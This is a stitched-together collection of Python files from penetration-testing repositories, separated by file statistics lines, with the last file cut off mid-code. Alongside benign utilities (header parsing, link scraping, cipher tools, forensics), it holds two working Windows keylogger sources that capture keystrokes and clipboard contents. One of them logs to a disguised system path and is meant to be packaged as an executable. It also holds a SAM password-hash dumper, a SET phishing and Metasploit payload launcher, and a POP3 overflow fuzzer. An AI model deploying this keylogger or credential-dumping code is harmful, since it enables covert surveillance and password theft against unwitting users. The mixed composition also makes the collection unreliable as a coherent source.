STRING_TYPES = StringType, UnicodeType
from _util import http2time
import _rfc3986
def is_html_file_extension(url, allow_xhtml):
ext = os.path.splitext(_rfc3986.urlsplit(url)[2])[1]
html_exts = [".htm", ".html"]
if allow_xhtml:
html_exts += [".xhtml"]
return ext in html_exts
def is_html(ct_headers, url, allow_xhtml=False):
"""
ct_headers: Sequence of Content-Type headers
url: Response URL
"""
if not ct_headers:
return is_html_file_extension(url, allow_xhtml)
headers = split_header_words(ct_headers)
if len(headers) < 1:
return is_html_file_extension(url, allow_xhtml)
first_header = headers[0]
first_parameter = first_header[0]
ct = first_parameter[0]
html_types = ["text/html"]
if allow_xhtml:
html_types += [
"text/xhtml", "text/xml",
"application/xml", "application/xhtml+xml",
]
return ct in html_types
def unmatched(match):
"""Return unmatched part of re.Match object."""
start, end = match.span(0)
return match.string[:start]+match.string[end:]
token_re = re.compile(r"^\s*([^=\s;,]+)")
quoted_value_re = re.compile(r"^\s*=\s*\"([^\"\\]*(?:\\.[^\"\\]*)*)\"")
value_re = re.compile(r"^\s*=\s*([^\s;,]*)")
escape_re = re.compile(r"\\(.)")
def split_header_words(header_values):
r"""Parse header values into a list of lists containing key,value pairs.
The function knows how to deal with ",", ";" and "=" as well as quoted
values after "=". A list of space separated tokens are parsed as if they
were separated by ";".
If the header_values passed as argument contains multiple values, then they
are treated as if they were a single value separated by comma ",".
This means that this function is useful for parsing header fields that
follow this syntax (BNF as from the HTTP/1.1 specification, but we relax
the requirement for tokens).
headers = #header
header = (token | parameter) *( [";"] (token | parameter))
token = 1*<any CHAR except CTLs or separators>
separators = "(" | ")" | "<" | ">" | "@"
| "," | ";" | ":" | "\" | <">
| "/" | "[" | "]" | "?" | "="
| "{" | "}" | SP | HT
quoted-string = ( <"> *(qdtext | quoted-pair ) <"> )
qdtext = <any TEXT except <">>
quoted-pair = "\" CHAR
parameter = attribute "=" value
attribute = token
value = token | quoted-string
Each header is represented by a list of key/value pairs. The value for a
simple token (not part of a parameter) is None. Syntactically incorrect
headers will not necessarily be parsed as you would want.
This is easier to describe with some examples:
>>> split_header_words(['foo="bar"; port="80,81"; discard, bar=baz'])
[[('foo', 'bar'), ('port', '80,81'), ('discard', None)], [('bar', 'baz')]]
>>> split_header_words(['text/html; charset="iso-8859-1"'])
[[('text/html', None), ('charset', 'iso-8859-1')]]
>>> split_header_words([r'Basic realm="\"foo\bar\""'])
[[('Basic', None), ('realm', '"foobar"')]]
"""
assert type(header_values) not in STRING_TYPES
result = []
for text in header_values:
orig_text = text
pairs = []
while text:
m = token_re.search(text)
if m:
text = unmatched(m)
name = m.group(1)
m = quoted_value_re.search(text)
if m: # quoted value
text = unmatched(m)
value = m.group(1)
value = escape_re.sub(r"\1", value)
else:
m = value_re.search(text)
if m: # unquoted value
text = unmatched(m)
value = m.group(1)
value = value.rstrip()
else:
# no value, a lone token
value = None
pairs.append((name, value))
elif text.lstrip().startswith(","):
# concatenated headers, as per RFC 2616 section 4.2
text = text.lstrip()[1:]
if pairs: result.append(pairs)
pairs = []
else:
# skip junk
non_junk, nr_junk_chars = re.subn("^[=\s;]*", "", text)
assert nr_junk_chars > 0, (
"split_header_words bug: '%s', '%s', %s" %
(orig_text, text, pairs))
text = non_junk
if pairs: result.append(pairs)
return result
join_escape_re = re.compile(r"([\"\\])")
def join_header_words(lists):
"""Do the inverse of the conversion done by split_header_words.
Takes a list of lists of (key, value) pairs and produces a single header
value. Attribute values are quoted if needed.
>>> join_header_words([[("text/plain", None), ("charset", "iso-8859/1")]])
'text/plain; charset="iso-8859/1"'
>>> join_header_words([[("text/plain", None)], [("charset", "iso-8859/1")]])
'text/plain, charset="iso-8859/1"'
"""
headers = []
for pairs in lists:
attr = []
for k, v in pairs:
if v is not None:
if not re.search(r"^\w+$", v):
v = join_escape_re.sub(r"\\\1", v) # escape " and \
v = '"%s"' % v
if k is None: # Netscape cookies may have no name
k = v
else:
k = "%s=%s" % (k, v)
attr.append(k)
if attr: headers.append("; ".join(attr))
return ", ".join(headers)
def strip_quotes(text):
if text.startswith('"'):
text = text[1:]
if text.endswith('"'):
text = text[:-1]
return text
def parse_ns_headers(ns_headers):
"""Ad-hoc parser for Netscape protocol cookie-attributes.
The old Netscape cookie format for Set-Cookie can for instance contain
an unquoted "," in the expires field, so we have to use this ad-hoc
parser instead of split_header_words.
XXX This may not make the best possible effort to parse all the crap
that Netscape Cookie headers contain. Ronald Tschalar's HTTPClient
parser is probably better, so could do worse than following that if
this ever gives any trouble.
Currently, this is also used for parsing RFC 2109 cookies.
"""
known_attrs = ("expires", "domain", "path", "secure",
# RFC 2109 attrs (may turn up in Netscape cookies, too)
"version", "port", "max-age")
result = []
for ns_header in ns_headers:
pairs = []
version_set = False
params = re.split(r";\s*", ns_header)
for ii in range(len(params)):
param = params[ii]
param = param.rstrip()
if param == "": continue
if "=" not in param:
k, v = param, None
else:
k, v = re.split(r"\s*=\s*", param, 1)
k = k.lstrip()
if ii != 0:
lc = k.lower()
if lc in known_attrs:
k = lc
if k == "version":
# This is an RFC 2109 cookie.
v = strip_quotes(v)
version_set = True
if k == "expires":
# convert expires date to seconds since epoch
v = http2time(strip_quotes(v)) # None if invalid
pairs.append((k, v))
if pairs:
if not version_set:
pairs.append(("version", "0"))
result.append(pairs)
return result
def _test():
import doctest, _headersutil
return doctest.testmod(_headersutil)
if __name__ == "__main__":
_test()
| 33.595041 | 80 | 0.526699 |
owtf | RESULTS = """
<!DOCTYPE html>
<html lang="en">
<body>
<div style="background-color: lightgrey;border:1px solid;border-radius:10px;width:300px;">
<h1>SSL SCAN REPORT</h1>
</div>
<h2> Input url: {{host}}</h2>
<h2> Domain: {{host}}</h2>
<h2> HTTP status code: {{status_code}}</h2>
<h2> IP: {{ip_address}}</h2>
<h2> Grade : {{grade}}</h2>
<h2> Secondary Grade: {{secondary_grade}}</h2>
<h2> Freak : {{freak}}</h2>
<h2> Poodle TLS : {{poodle}} (-3:timeout,-2:TLS not supported,-1:test failed,0:unknown,1:not vulnerable,3:vulnerable)</h2>
<h2> Insecure Renegotiation supported: {{insecure_reneg}}</h2>
<h2> openSslCcs test : {{openssl_ccs}} (-1:test failed,0: unknown,1: not vulnerable,2:possibly vulnerbale,3:vulnerable and exploitable)</h2>
<h2> Insecure DH : {{insecure_dh}} </h2>
{{protocol}}
<h2> Certificate Expired : {{cert_exp}}</h2>
<h2> Self-signed cert: {{self_signed}}</h2>
<h2> Supports RC4: {{rc4}}</h2>
<h2> Forward secrecy support: {{fwd_sec}} (1:et if at least one browser from our simulations negotiated a Forward Secrecy suite,2:et based on Simulator results if FS is achieved with modern clients. For example, the server supports ECDHE suites, but not DHE,4:set if all simulated clients achieve FS. In other words, this requires an ECDHE + DHE combination to be supported.)</h2>
{{cert_chains}}
<h2> Secure renegotiation support: {{sec_reneg}}</h2>
</body>
</html>
"""
| 49.931034 | 384 | 0.647696 |
Python-Penetration-Testing-for-Developers | import urllib
from bs4 import BeautifulSoup
url = raw_input("Enter the URL ")
ht= urllib.urlopen(url)
html_page = ht.read()
b_object = BeautifulSoup(html_page)
print b_object.title
print b_object.title.text
for link in b_object.find_all('a'):
print(link.get('href'))
| 21.5 | 35 | 0.736059 |
cybersecurity-penetration-testing | import threading
import time
import socket, subprocess,sys
import thread
import collections
from datetime import datetime
'''section 1'''
net = raw_input("Enter the Network Address ")
st1 = int(raw_input("Enter the starting Number "))
en1 = int(raw_input("Enter the last Number "))
en1=en1+1
dic = collections.OrderedDict()
net1= net.split('.')
a = '.'
net2 = net1[0]+a+net1[1]+a+net1[2]+a
t1= datetime.now()
'''section 2'''
class myThread (threading.Thread):
def __init__(self,st,en):
threading.Thread.__init__(self)
self.st = st
self.en = en
def run(self):
run1(self.st,self.en)
'''section 3'''
def scan(addr):
sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = sock.connect_ex((addr,135))
if result==0:
sock.close()
return 1
else :
sock.close()
def run1(st1,en1):
for ip in xrange(st1,en1):
addr = net2+str(ip)
if scan(addr):
dic[ip]= addr
'''section 4'''
total_ip =en1-st1
tn =20 # number of ip handled by one thread
total_thread = total_ip/tn
total_thread=total_thread+1
threads= []
try:
for i in xrange(total_thread):
#print "i is ",i
en = st1+tn
if(en >en1):
en =en1
thread = myThread(st1,en)
thread.start()
threads.append(thread)
st1 =en
except:
print "Error: unable to start thread"
print "\tNumber of Threads active:", threading.activeCount()
for t in threads:
t.join()
print "Exiting Main Thread"
dict = collections.OrderedDict(sorted(dic.items()))
for key in dict:
print dict[key],"-->" "Live"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 22.086957 | 60 | 0.675879 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
senderMac = "aa:aa:aa:aa:aa:aa"
broadcastMac = "ff:ff:ff:ff:ff:ff"
for ssid in open('ssidList.txt', 'r').readlines():
pkt = RadioTap()/Dot11(type = 0, subtype = 4 ,addr1 = broadcastMac, addr2 = senderMac, addr3 = broadcastMac)/Dot11ProbeReq()/Dot11Elt(ID=0, info =ssid.strip()) / Dot11Elt(ID=1, info = "\x02\x04\x0b\x16") / Dot11Elt(ID=3, info="\x08")
print ("Checking ssid:" + ssid)
print(pkt.show())
sendp (pkt, iface ="en0", count=1)
| 36.076923 | 237 | 0.64657 |
cybersecurity-penetration-testing | # Cryptomath Module
# http://inventwithpython.com/hacking (BSD Licensed)
def gcd(a, b):
# Return the GCD of a and b using Euclid's Algorithm
while a != 0:
a, b = b % a, a
return b
def findModInverse(a, m):
# Returns the modular inverse of a % m, which is
# the number x such that a*x % m = 1
if gcd(a, m) != 1:
return None # no mod inverse if a & m aren't relatively prime
# Calculate using the Extended Euclidean Algorithm:
u1, u2, u3 = 1, 0, a
v1, v2, v3 = 0, 1, m
while v3 != 0:
q = u3 // v3 # // is the integer division operator
v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3
return u1 % m | 29.5 | 89 | 0.54446 |
Penetration_Testing |
'''
Suggestion:
Use py2exe to turn this script into a Windows executable.
Example: python setup.py py2exe
Run as administrator to store file under current path.
Change pathname if administrator level privilege is not possible.
'''
import pyHook
import pythoncom
import sys
import logging
from ctypes import *
from win32clipboard import OpenClipboard, GetClipboardData, CloseClipboard
from datetime import datetime
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
file_log = "C:\\Windows\\systemlog.txt"
def get_current_process():
# Get a handle to the foreground window
fg_window = user32.GetForegroundWindow()
# Find the process ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(fg_window, byref(pid))
# Store the current process ID
process_id = "{}".format(pid.value)
# Grab the executable
executable = create_string_buffer("\x00" * 512)
fg_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
# Get the executable name
psapi.GetModuleBaseNameA(fg_process, None, byref(executable), 512)
# Read the executable name
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(fg_window, byref(window_title), 512)
# Get the current time
time_now = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
with open(file_log, 'a+') as f:
# Print out the header if we're in the right process
data1 = "\n{} - PID: {} - {} - {}:\n".format(time_now, process_id, executable.value, window_title.value)
f.write(data1)
# Close handles
kernel32.CloseHandle(fg_window)
kernel32.CloseHandle(fg_process)
def OnKeyboardEvent(event):
global current_window
# Check to see if the target changed windows
if event.WindowName != current_window:
current_window = event.WindowName
get_current_process()
with open(file_log, 'a+') as f:
# If the target presses a standard key
if event.Ascii > 32 and event.Ascii < 127:
data = chr(event.Ascii)
f.write(data)
else:
# If [Ctrl-V], get the value on the clipboard
if event.Key == "V":
OpenClipboard()
pasted_value = GetClipboardData()
CloseClipboard()
data = "[PASTE] - {}".format(pasted_value)
f.write(data)
else:
data = "[{}]".format(event.Key)
f.write(data)
# Pass execution to the next hook registered
return True
# Create and register a hook manager
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
# Register the hook and execute forever
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
| 23.696078 | 106 | 0.72081 |
cybersecurity-penetration-testing | import sys
import struct
memory_file = "WinXPSP2.vmem"
sys.path.append("/Downloads/volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
config.parse_options()
config.PROFILE = "WinXPSP2x86"
config.LOCATION = "file://%s" % memory_file
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump
registry = RegistryApi(config)
registry.populate_offsets()
sam_offset = None
sys_offset = None
for offset in registry.all_offsets:
if registry.all_offsets[offset].endswith("\\SAM"):
sam_offset = offset
print "[*] SAM: 0x%08x" % offset
if registry.all_offsets[offset].endswith("\\system"):
sys_offset = offset
print "[*] System: 0x%08x" % offset
if sam_offset is not None and sys_offset is not None:
config.sys_offset = sys_offset
config.sam_offset = sam_offset
hashdump = HashDump(config)
for hash in hashdump.calculate():
print hash
break
if sam_offset is None or sys_offset is None:
print "[*] Failed to find the system or SAM offsets." | 25.4 | 68 | 0.69745 |
owtf | #!/usr/bin/env python
"""
This is the command-line front-end in charge of processing arguments and call the framework
"""
import getopt
import os
import subprocess
import sys
from collections import defaultdict
def GetName():
return sys.argv[0]
def Usage(Message):
print("Usage:")
print(
GetName()
+ " EMAIL_TARGET=? EMAIL_FROM=? SMTP_LOGIN=? SMTP_PASS=? SMTP_HOST=? SMTP_PORT=? EMAIL_PRIORITY=? PDF_TEMPLATE=? MSF_LISTENER_PORT=? MSF_LISTENER_SETUP=? ATTACHMENT_NAME=? SET_EMAIL_TEMPLATE=? PHISHING_PAYLOAD=? PHISHING_SCRIPT_DIR=? TOOL_SET_DIR=?"
)
print("ERROR: " + Message)
sys.exit(-1)
def ShellExec(Command):
print("\nExecuting (Control+C to abort THIS COMMAND ONLY):\n" + Command)
Output = ""
try: # Stolen from: http://stackoverflow.com/questions/5833716/how-to-capture-output-of-a-shell-script-running-in-a-separate-process-in-a-wxpyt
proc = subprocess.Popen(Command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1)
while True:
line = proc.stdout.readline()
if not line:
break
print(multi_replace(line, {"\n": "", "\r": ""})) # Show progress on the screen too!
Output += line # Save as much output as possible before a tool crashes! :)
except KeyboardInterrupt:
Output += self.Core.Error.user_abort("Command", Output) # Identify as Command Level abort
return Output
# Perform multiple replacements in one go using the replace dictionary in format: { 'search' : 'replace' }
def multi_replace(Text, ReplaceDict):
NewText = Text
for Search, Replace in ReplaceDict.items():
NewText = NewText.replace(Search, str(Replace))
return NewText
def GetParams(): # Basic validation and parameter retrieval:
MandatoryParams = [
"EMAIL_TARGET",
"EMAIL_FROM",
"SMTP_LOGIN",
"SMTP_PASS",
"SMTP_HOST",
"SMTP_PORT",
"EMAIL_PRIORITY",
"PDF_TEMPLATE",
"MSF_LISTENER_PORT",
"MSF_LISTENER_SETUP",
"ATTACHMENT_NAME",
"SET_EMAIL_TEMPLATE",
"PHISHING_PAYLOAD",
"PHISHING_SCRIPT_DIR",
"TOOL_SET_DIR",
]
ScriptName = GetName()
try:
Opts, Args = getopt.getopt(sys.argv[1:], "a:")
except getopt.GetoptError:
Usage("Invalid " + ScriptName + " option(s)")
Params = defaultdict(list)
for Arg in Args:
Chunks = Arg.split("=")
if len(Chunks) != 2:
Usage("'" + str(Arg) + "' is incorrect: The parameter format is ARGNAME=ARGVALUE")
ArgName = Chunks[0]
ArgValue = Arg.replace(ArgName + "=", "")
Params[ArgName] = ArgValue
for Mandatory in MandatoryParams:
if Mandatory not in Params:
Usage("Must include parameter: " + Mandatory)
SETScript = Params["PHISHING_SCRIPT_DIR"] + "/set_scripts/payload" + Params["PHISHING_PAYLOAD"] + ".set"
SETDebugAutomate = Params["PHISHING_SCRIPT_DIR"] + "/set_debug_automate.sh"
MandatoryPaths = [
Params["TOOL_SET_DIR"], Params["PDF_TEMPLATE"], Params["EMAIL_TARGET"], SETScript, SETDebugAutomate
]
for Path in MandatoryPaths:
if not os.path.exists(Path):
Usage("The path '" + str(Path) + "' must exist in your filesystem")
Params["SET_PARAMS_SCRIPT"] = SETScript
Params["SET_TMP_SCRIPT"] = "/tmp/set_tmp_script.set"
Params["SET_DEBUG_AUTOMATE"] = SETDebugAutomate
return Params
Params = GetParams() # Step 1 - Retrieve params and basic validation
with open(
Params["SET_TMP_SCRIPT"], "w"
) as file: # Step 2 - Create temporary script with hard-coded values from parameters:
file.write(multi_replace(open(Params["SET_PARAMS_SCRIPT"]).read(), Params))
ShellExec(
Params["SET_DEBUG_AUTOMATE"] + " " + Params["TOOL_SET_DIR"] + " " + Params["SET_TMP_SCRIPT"]
) # Step 3 - Run SET script
ShellExec("rm -f " + Params["SET_TMP_SCRIPT"]) # Step 4 - Remove temporary script with hard-coded values
| 34.964286 | 257 | 0.633722 |
cybersecurity-penetration-testing | # Affine Cipher Hacker
# http://inventwithpython.com/hacking (BSD Licensed)
import pyperclip, affineCipher, detectEnglish, cryptomath
SILENT_MODE = False
def main():
# You might want to copy & paste this text from the source code at
# http://invpy.com/affineHacker.py
myMessage = """U&'<3dJ^Gjx'-3^MS'Sj0jxuj'G3'%j'<mMMjS'g{GjMMg9j{G'g"'gG'<3^MS'Sj<jguj'm'P^dm{'g{G3'%jMgjug{9'GPmG'gG'-m0'P^dm{LU'5&Mm{'_^xg{9"""
hackedMessage = hackAffine(myMessage)
if hackedMessage != None:
# The plaintext is displayed on the screen. For the convenience of
# the user, we copy the text of the code to the clipboard.
print('Copying hacked message to clipboard:')
print(hackedMessage)
pyperclip.copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackAffine(message):
print('Hacking...')
# Python programs can be stopped at any time by pressing Ctrl-C (on
# Windows) or Ctrl-D (on Mac and Linux)
print('(Press Ctrl-C or Ctrl-D to quit at any time.)')
# brute-force by looping through every possible key
for key in range(len(affineCipher.SYMBOLS) ** 2):
keyA = affineCipher.getKeyParts(key)[0]
if cryptomath.gcd(keyA, len(affineCipher.SYMBOLS)) != 1:
continue
decryptedText = affineCipher.decryptMessage(key, message)
if not SILENT_MODE:
print('Tried Key %s... (%s)' % (key, decryptedText[:40]))
if detectEnglish.isEnglish(decryptedText):
# Check with the user if the decrypted key has been found.
print()
print('Possible encryption hack:')
print('Key: %s' % (key))
print('Decrypted message: ' + decryptedText[:200])
print()
print('Enter D for done, or just press Enter to continue hacking:')
response = input('> ')
if response.strip().upper().startswith('D'):
return decryptedText
return None
# If affineHacker.py is run (instead of imported as a module) call
# the main() function.
if __name__ == '__main__':
main() | 35.35 | 149 | 0.609633 |
Effective-Python-Penetration-Testing | import pyHook, pythoncom, sys, logging
file_log='C:\\log.txt'
def OnKeyboardEvent(event):
logging.basicConfig(filename*file_log, level=logging.DEBUG, format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
#instantiate HookManager class
hooks_manager = pyHook.HookManager ()
#listen to all keystrokes
hooks_manager.KeyDown = OnKeyboardEvent
#hook the keyboard
hooks_manager.HookKeyboard ()
#Pump all messages for current thread
pythoncom.PumpMessages () | 25.052632 | 83 | 0.773279 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
import re
def printLinks(url):
ab = anonBrowser()
ab.anonymize()
page = ab.open(url)
html = page.read()
try:
print '[+] Printing Links From Regex.'
link_finder = re.compile('href="(.*?)"')
links = link_finder.findall(html)
for link in links:
print link
except:
pass
try:
print '\n[+] Printing Links From BeautifulSoup.'
soup = BeautifulSoup(html)
links = soup.findAll(name='a')
for link in links:
if link.has_key('href'):
print link['href']
except:
pass
def main():
parser = optparse.OptionParser('usage %prog ' +\
'-u <target url>')
parser.add_option('-u', dest='tgtURL', type='string',\
help='specify target url')
(options, args) = parser.parse_args()
url = options.tgtURL
if url == None:
print parser.usage
exit(0)
else:
printLinks(url)
if __name__ == '__main__':
main()
| 18.534483 | 58 | 0.55742 |
Penetration-Testing-Study-Notes | #!/usr/bin/python
import socket
#create an array of buffers, while incrementing them
buffer=["A"]
counter=100
while len(buffer) <=30:
buffer.append("A"*counter)
counter=counter+200
for string in buffer:
print "Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.11.13.62',110))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS ' + string + '\r\n')
s.send('QUIT\r\n')
s.close()
| 20.363636 | 52 | 0.688699 |
owtf | """
owtf.lib.cli_options
~~~~~~~~~~~~~~~~~~~~
Main CLI processing machine
"""
from __future__ import print_function
import argparse
import sys
def usage(error_message):
"""Display the usage message describing how to use owtf.
:param error_message: Error message to display
:type error_message: `str`
:return: None
:rtype: None
"""
full_path = sys.argv[0].strip()
main = full_path.split("/")[-1]
print("Current Path: {}".format(full_path))
print(
"Syntax: {}"
" [ options ] <target1 target2 target3 ..> where target can be:"
" <target URL / hostname / IP>".format(main)
)
print(" NOTE:" " targets can also be provided via a text file", end="\n" * 3)
print("Examples: ", end="\n" * 2)
print("Run all web plugins: {}" " http://my.website.com".format(main))
print("Run only passive + semi_passive plugins: {}" " -t quiet http://my.website.com".format(main))
print("Run only active plugins: {}" " -t active http://my.website.com".format(main))
print()
print(
"Run all plugins except 'OWASP-CM-001: Testing_for_SSL-TLS': {}"
" -e 'OWASP-CM-001' http://my.website.com".format(main)
)
print(
"Run all plugins except 'OWASP-CM-001: Testing_for_SSL-TLS': {}"
" -e 'Testing_for_SSL-TLS' http://my.website.com".format(main)
)
print()
print(
"Run only 'OWASP-CM-001: Testing_for_SSL-TLS': {}"
" -o 'OWASP-CM-001' http://my.website.com".format(main)
)
print(
"Run only 'OWASP-CM-001: Testing_for_SSL-TLS': {}"
" -o 'Testing_for_SSL-TLS' http://my.website.com".format(main)
)
print()
print(
"Run only OWASP-IG-005 and OWASP-WU-VULN: {}"
" -o 'OWASP-IG-005,OWASP-WU-VULN' http://my.website.com".format(main)
)
print(
"Run using my resources file and proxy: {}"
" -m r:/home/me/owtf_resources.cfg"
" -x 127.0.0.1:8080 http://my.website.com".format(main)
)
print()
print(
"Run using TOR network: {}"
" -o OWTF-WVS-001 http://my.website.com"
" --tor 127.0.0.1:9050:9051:password:1".format(main)
)
if error_message:
print("\nERROR: {}".format(error_message))
from owtf.core import finish
finish()
def parse_options(cli_options, valid_groups, valid_types):
"""Main arguments processing for the CLI
:param cli_options: CLI args Supplied by user
:type cli_options: `dict`
:param valid_groups: Plugin groups to chose from
:type valid_groups: `list`
:param valid_types: Plugin types to chose from
:type valid_types: `list`
:return:
:rtype:
"""
parser = argparse.ArgumentParser(
prog="owtf",
description="OWASP OWTF, the Offensive (Web) Testing Framework, is "
"an OWASP+PTES-focused try to unite great tools and "
"make pentesting more efficient @owtfp http://owtf.org"
"\nAuthor: Abraham Aranguren <name.surname@owasp.org> - "
"http://7-a.org - Twitter: @7a_",
)
parser.add_argument(
"-l",
"--list-plugins",
dest="list_plugins",
default=None,
choices=valid_groups,
help="List available plugins in the plugin group (web, network or auxiliary)",
)
parser.add_argument(
"-f",
"--force",
dest="force_overwrite",
action="store_true",
help="Force plugin result overwrite (default is avoid overwrite)",
)
parser.add_argument(
"-i",
"--interactive",
dest="interactive",
default="yes",
help="interactive: yes (default, more control) / no (script-friendly)",
)
parser.add_argument(
"-e",
"--except",
dest="except_plugins",
default=None,
help="Comma separated list of plugins to be ignored in the test",
)
parser.add_argument(
"-o",
"--only",
dest="only_plugins",
default=None,
help="Comma separated list of the only plugins to be used in the test",
)
parser.add_argument(
"-p",
"--inbound-proxy",
dest="inbound_proxy",
default=None,
help="(ip:)port - Setup an inbound proxy for manual site analysis",
)
parser.add_argument(
"-x",
"--outbound-proxy",
dest="outbound_proxy",
default=None,
help="type://ip:port - Send all OWTF requests using the proxy "
"for the given ip and port. The 'type' can be 'http'(default) "
"or 'socks'",
)
parser.add_argument(
"-xa",
"--outbound-proxy-auth",
dest="outbound_proxy_auth",
default=None,
help="username:password - Credentials if any for outbound proxy",
)
parser.add_argument(
"-T",
"--tor",
dest="tor_mode",
default=None,
help="ip:port:tor_control_port:password:IP_renew_time - "
"Sends all OWTF requests through the TOR network. "
"For configuration help run -T help.",
)
parser.add_argument(
"-s",
"--simulation",
dest="Simulation",
action="store_true",
help="Do not do anything, simply simulate how plugins would run",
)
parser.add_argument(
"-g",
"--plugin-group",
dest="plugin_group",
default=None,
choices=valid_groups,
help="<web/network/auxiliary> - Initial plugin group: web (default) = "
"targets are interpreted as URLs = web assessment only\n"
"network = targets are interpreted as hosts/network ranges = "
"traditional network discovery and probing\nauxiliary = targets "
"are NOT interpreted, it is up to the plugin/resource "
"definition to decide what to do with the target",
)
parser.add_argument(
"-t",
"--plugin-type",
dest="plugin_type",
default="all",
choices=valid_types,
help="<plugin type> - For web plugins: passive, semi_passive, "
"quiet (passive + semi_passive), grep, active, all (default)\n"
"NOTE: grep plugins run automatically after semi_passive and "
"active in the default profile",
)
parser.add_argument("-port", "--port", dest="rport", default=None, help="<port> - Port to run probes")
parser.add_argument(
"-portwaves",
"--portwaves",
dest="port_waves",
default="10,100,1000",
help="<wave1,wave2,wave3> - Waves to run network scanning",
)
parser.add_argument(
"-proxy",
"--proxy",
dest="proxy_mode",
default=True,
action="store_true",
help="Use this flag to run OWTF Inbound Proxy",
)
parser.add_argument(
"--nowebui", dest="nowebui", default=False, action="store_true", help="Run OWTF without its Web UI."
)
parser.add_argument("targets", nargs="*", help="List of targets")
return parser.parse_args(cli_options)
| 32.060185 | 115 | 0.565826 |
Python-Penetration-Testing-Cookbook | import urllib.request
import urllib.parse
import re
from os.path import basename
url = 'https://www.packtpub.com/'
queryString = 'all?search=&offset='
for i in range(0, 200, 12):
query = queryString + str(i)
url += query
print(url)
response = urllib.request.urlopen(url)
source = response.read()
file = open("packtpub.txt", "wb")
file.write(source)
file.close()
patten = '(http)?s?:?(\/\/[^"]*\.(?:png|jpg|jpeg|gif|png|svg))'
for line in open('packtpub.txt'):
for m in re.findall(patten, line):
print('https:' + m[1])
fileName = basename(urllib.parse.urlsplit(m[1])[2])
print(fileName)
request = 'https:' + urllib.parse.quote(m[1])
img = urllib.request.urlopen(request).read()
file = open(fileName, "wb")
file.write(img)
file.close()
break
| 27.15625 | 67 | 0.57 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Christian Hilgers, Holger Macht, Tilo Müller, Michael Spreitzenbarth
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.pslist as linux_pslist
import volatility.plugins.linux.dalvik as dalvik
import volatility.plugins.linux.dalvik_loaded_classes as dalvik_loaded_classes
import volatility.plugins.linux.dalvik_find_class_instance as dalvik_find_class_instance
import time
from struct import *
###################################################################################################
class dalvik_app_pictures(linux_common.AbstractLinuxCommand):
###################################################################################################
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
dalvik.register_option_PID(self._config)
dalvik.register_option_GDVM_OFFSET(self._config)
self._config.add_option('CLASS_OFFSET', short_option = 'c', default = None,
help = 'This is the offset (in hex) of system class LocalAlbum.java', action = 'store', type = 'str')
###################################################################################################
def calculate(self):
# if no gDvm object offset was specified, use this one
if not self._config.GDVM_OFFSET:
self._config.GDVM_OFFSET = str(0x41b0)
# use linux_pslist plugin to find process address space and ID if not specified
proc_as = None
tasks = linux_pslist.linux_pslist(self._config).calculate()
for task in tasks:
if str(task.comm) == "droid.gallery3d":
proc_as = task.get_process_address_space()
self._config.PID = str(task.pid)
break
# use dalvik_loaded_classes plugin to find class offset if not specified
if not self._config.CLASS_OFFSET:
classes = dalvik_loaded_classes.dalvik_loaded_classes(self._config).calculate()
for task, clazz in classes:
if (dalvik.getString(clazz.sourceFile)+"" == "LocalAlbum.java"):
self._config.CLASS_OFFSET = str(hex(clazz.obj_offset))
break
# use dalvik_find_class_instance plugin to find a list of possible class instances
instance = dalvik_find_class_instance.dalvik_find_class_instance(self._config).calculate()
for sysClass, inst in instance:
# boolean value, 1 for images, 0 for videos
isImage = inst.clazz.getJValuebyName(inst, "mIsImage").int
# sanity check
if isImage != True:
continue
# number of pictures, initilized with -1
count = inst.clazz.getJValuebyName(inst, "mCachedCount").int
# sanity check
if count == -1:
continue
# get album name
album_name = inst.clazz.getJValuebyName(inst, "mName").Object.dereference_as('Object')
# get pictures of album
album_path = inst.clazz.getJValuebyName(inst, "mItemPath").Object.dereference_as('Object')
iCache = album_path.clazz.getJValuebyName(album_path, "mChildren").Object.dereference_as('Object')
hashmap = iCache.clazz.getJValuebyName(iCache, "mWeakMap").Object.dereference_as('Object')
# in this table there is a reference to every single picture
map_table = hashmap.clazz.getJValuebyName(hashmap, "table").Object.dereference_as('ArrayObject')
# parse the table
map_entries = dalvik.parseArrayObject(map_table)
# for every reference of the table
for field in map_entries:
entry = field.clazz.getJValuebyName(field, "value").Object.dereference_as('Object')
weak_reference_clazz = entry.clazz.super.dereference_as('ClassObject')
reference_clazz = weak_reference_clazz.super.dereference_as('ClassObject')
